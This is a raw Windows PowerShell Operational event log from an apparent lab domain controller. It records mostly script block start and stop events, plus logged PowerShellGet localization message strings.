ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467108
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467106
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467105
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467104
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467103
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467102
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467101
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467100
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467098
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467097
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467096
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467095
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467094
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467093
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467092
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467091
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467090
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467089
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467088
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467087
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467086
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467085
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467084
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467083
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467082
Keywords=None
Message=Started invocation of ScriptBlock ID: 89f9a84f-1999-4001-aa45-9a89d206ecd1
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467081
Keywords=None
Message=Started invocation of ScriptBlock ID: 2936c094-81a2-4409-93d7-92d7fce5ceae
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467080
Keywords=None
Message=Completed invocation of ScriptBlock ID: ddd9f846-cfec-46c3-886c-fca415c9f34d
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467079
Keywords=None
Message=Started invocation of ScriptBlock ID: ddd9f846-cfec-46c3-886c-fca415c9f34d
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467078
Keywords=None
Message=Completed invocation of ScriptBlock ID: ddd9f846-cfec-46c3-886c-fca415c9f34d
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467077
Keywords=None
Message=Started invocation of ScriptBlock ID: ddd9f846-cfec-46c3-886c-fca415c9f34d
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467076
Keywords=None
Message=Completed invocation of ScriptBlock ID: da509330-2750-4195-852f-b8c70894f216
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467075
Keywords=None
Message=Started invocation of ScriptBlock ID: da509330-2750-4195-852f-b8c70894f216
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467074
Keywords=None
Message=Completed invocation of ScriptBlock ID: 33abcfef-bb94-4a94-a086-4ec444ae02cc
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467073
Keywords=None
Message=Started invocation of ScriptBlock ID: 33abcfef-bb94-4a94-a086-4ec444ae02cc
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467072
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3140fed5-5fa2-447a-8859-aac0ee795721
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467071
Keywords=None
Message=Started invocation of ScriptBlock ID: 3140fed5-5fa2-447a-8859-aac0ee795721
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467070
Keywords=None
Message=Completed invocation of ScriptBlock ID: 45379c41-a4a5-4f66-b608-7333082ce12f
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6e925164-9e2f-4b72-a634-5bfcdef94594
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467068
Keywords=None
Message=Started invocation of ScriptBlock ID: 6e925164-9e2f-4b72-a634-5bfcdef94594
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467067
Keywords=None
Message=Creating Scriptblock text (3 of 3):
}' to the publish location '{1}'. Please allow few minutes for '{2}' to show up in the search results.
UnableToResolveScriptDependency=PowerShellGet cannot resolve the {0} dependency '{1}' of the script '{2}' on the repository '{3}'. Verify that the dependent {0} '{1}' is available in the repository '{3}'. If this dependent {0} '{1}' is managed externally, add it to the '{4}' entry in the script metadata.
InvalidVersion=Cannot convert value '{0}' to type 'System.Version'.
InvalidGuid=Cannot convert value '{0}' to type 'System.Guid'.
InvalidParameterValue=The specified value '{0}' for the parameter '{1}' is invalid. Ensure that it does not contain '<#' or '#>'.
MissingPSScriptInfo=PSScriptInfo is not specified in the script file '{0}'. You can use the Update-ScriptFileInfo with -Force or New-ScriptFileInfo cmdlet to add the PSScriptInfo to the script file.
MissingRequiredPSScriptInfoProperties=Script '{0}' is missing required metadata properties. Verify that the script file has Version, Guid, Description and Author properties. You can use the Update-ScriptFileInfo or New-ScriptFileInfo cmdlet to add or update the PSScriptInfo to the script file.
SkippedScriptDependency=Because dependent script '{0}' was skipped in the script dependencies list, users might not know how to install it.
SourceLocationPathsForModulesAndScriptsShouldBeEqual=SourceLocation '{0}' and ScriptSourceLocation '{1}' should be same for SMB Share or Local directory based repositories.
SourceLocationUrisForModulesAndScriptsShouldBeDifferent=SourceLocation '{0}' and ScriptSourceLocation '{1}' should not be same for URI based repositories.
PublishLocationPathsForModulesAndScriptsShouldBeEqual=PublishLocation '{0}' and ScriptPublishLocation '{1}' should be same for SMB Share or Local directory based repositories.
SpecifiedNameIsAlearyUsed=The specified name '{0}' is already used for a different item on the specified repository '{1}'. Run '{2} -Name {0} -Repository {1}' to check whether the specified name '{0}' is already taken.
InvalidScriptFilePath=The script file path '{0}' is not valid. The value of the Path argument must resolve to a single file that has a '.ps1' extension. Change the value of the Path argument to point to a valid ps1 file, and then try again.
NuGetApiKeyIsRequiredForNuGetBasedGalleryService=NuGetApiKey is required for publishing a module or script file to the specified repository '{0}' whose publish location is '{1}'. Try again after specifying a valid value for the NuGetApiKey parameter. To get your API key, view your profile page.
ScriptFileExist=The specified script file '{0}' already exists.
PublishPSArtifactUnsupportedOnNano=Publish-{0} is not supported on Nano Server.
InvalidEnvironmentVariableName=The specified environment variable name '{0}' exceeded the allowed limit of '{1}' characters.
PublishLocation=Publish Location:'{0}'.
ScriptPATHPromptCaption=PATH Environment Variable Change
ScriptPATHPromptQuery=Your system has not been configured with a default script installation path yet, which means you can only run a script by specifying the full path to the script file. This action places the script into the folder '{0}', and adds that folder to your PATH environment variable. Do you want to add the script installation path '{0}' to the PATH environment variable?
AddedScopePathToProcessSpecificPATHVariable=Added scripts installation location '{0}' for '{1}' scope to process specific PATH environment varaible.
AddedScopePathToPATHVariable=Added scripts installation location '{0}' for '{1}' scope to PATH environment varaible.
FilePathInFileListNotWithinModuleBase=Path '{0}' defined in FileList is not within module base '{1}'. Provide the correct FileList parameters and then try again.
ManifestFileReadWritePermissionDenied=The current user does not have read-write permissions for the file:'{0}'. Check the file permissions and then try again.
MissingTheRequiredPathOrPassThruParameter=The Path or PassThru parameter is required for creating the script file info. A new script file will be created with the script file info when the Path parameter is specified. Script file info will be returned if the PassThru parameter is specified. Try again after specifying the required parameter.
DescriptionParameterIsMissingForAddingTheScriptFileInfo=Description parameter is missing for adding the metadata to the script file. Try again after specifying the description.
UnableToAddPSScriptInfo=Unable to add PSScriptInfo to the script file '{0}'. You can use the New-ScriptFileInfo cmdlet to add the metadata to the existing script file.
RegisterVSTSFeedAsNuGetPackageSource=Publishing to a VSTS package management feed '{0}' requires it to be registered as a NuGet package source. Retry after adding this source '{0}' as NuGet package source by following the instructions specified at '{1}'
InvalidModuleAuthenticodeSignature=The module '{0}' cannot be installed or updated because the authenticode signature of the file '{1}' is not valid.
InvalidCatalogSignature=The module '{0}' cannot be installed because the catalog signature in '{1}' does not match the hash generated from the module.
AuthenticodeIssuerMismatch=Authenticode issuer '{0}' of the new module '{1}' with version '{2}' is not matching with the authenticode issuer '{3}' of the previously-installed module '{4}' with version '{5}'. If you still want to install or update, use -SkipPublisherCheck parameter.
ModuleCommandAlreadyAvailable=A command with name '{0}' is already available on this system. This module '{1}' may override the existing commands. If you still want to install this module '{1}', use -AllowClobber parameter.
CatalogFileFound=Found the catalog file '{0}' in the module '{1}' contents.
CatalogFileNotFoundInAvailableModule=Catalog file '{0}' is not found in the contents of the previously-installed module '{1}' with the same name.
CatalogFileNotFoundInNewModule=Catalog file '{0}' is not found in the contents of the module '{1}' being installed.
ValidAuthenticodeSignature=Valid authenticode signature found in the catalog file '{0}' for the module '{1}'.
ValidAuthenticodeSignatureInFile=Valid authenticode signature found in the file '{0}' for the module '{1}'.
ValidatingCatalogSignature=Validating the '{0}' module files for catalog signing using the catalog file '{1}'.
AuthenticodeIssuerMatch=Authenticode issuer '{0}' of the new module '{1}' with version '{2}' matches with the authenticode issuer '{3}' of the previously-installed module '{4}' with version '{5}'.
ValidCatalogSignature=The catalog signature in '{0}' of the module '{1}' is valid and matches with the hash generated from the module contents.
SkippingPublisherCheck=Skipping the Publisher check for the version '{0}' of module '{1}'.
SourceModuleDetailsForPublisherValidation=For publisher validation, using the previously-installed module '{0}' with version '{1}' under '{2}' with publisher name '{3}'. Is this module signed by Microsoft: '{4}'.
NewModuleVersionDetailsForPublisherValidation=For publisher validation, current module '{0}' with version '{1}' with publisher name '{2}'. Is this module signed by Microsoft: '{3}'.
PublishersMatch=Publisher '{0}' of the new module '{1}' with version '{2}' matches with the publisher '{3}' of the previously-installed module '{4}' with version '{5}'. Both versions are signed with a Microsoft root certifacte.
PublishersMismatch=A Microsoft-signed module named '{0}' with version '{1}' that was previously installed conflicts with the new module '{2}' from publisher '{3}' with version '{4}'. Installing the new module may result in system instability. If you still want to install or update, use -SkipPublisherCheck parameter.
ModuleIsNotCatalogSigned=The version '{0}' of the module '{1}' being installed is not catalog signed. Ensure that the version '{0}' of the module '{1}' has the catalog file '{2}' and signed with the same publisher '{3}' as the previously-installed module '{0}' with version '{4}' under the directory '{5}'. If you still want to install or update, use -SkipPublisherCheck parameter.
###PSLOC
'@



ScriptBlock ID: 6e925164-9e2f-4b72-a634-5bfcdef94594
Path:
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467066
Keywords=None
Message=Creating Scriptblock text (2 of 3):
}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
PublishScriptSupportsOnlyNuGetBasedPublishLocations=Publish-Script only supports the NuGet-based publish locations. The ScriptPublishLocation '{0}' of the repository '{1}' is not a NuGet-based publish location. Retry after setting the ScriptPublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
DynamicParameterHelpMessage=The dynamic parameter '{0}' is required for Find-Module and Install-Module when using the PackageManagement provider '{1}' and source location '{2}'. Please enter your value for the '{3}' dynamic parameter:
ProviderApiDebugMessage=In PowerShellGet Provider - '{0}'.
ModuleUninstallNotSupported=Module uninstallation is not supported. To remove a module, please delete the module folder.
FastPackageReference=The FastPackageReference is '{0}'.
PackageManagementProviderIsNotAvailable=The specified PackageManagement provider '{0}' is not available.
SpecifiedSourceName=Using the specified source names : '{0}'.
